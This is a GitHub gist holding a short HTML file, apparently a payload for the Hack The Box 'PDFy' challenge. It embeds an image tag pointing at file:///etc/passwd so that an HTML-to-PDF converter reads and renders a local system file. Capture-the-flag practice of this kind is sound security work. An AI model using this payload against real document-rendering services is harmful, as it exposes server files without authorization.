Skip to content

Instantly share code, notes, and snippets.

@rubenflush
rubenflush / test.html
Last active April 15, 2024 19:47
HTB
<!DOCTYPE html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>PDFy</title>
</head>
<body>
<img src="file:///etc/passwd">
</body>
</html>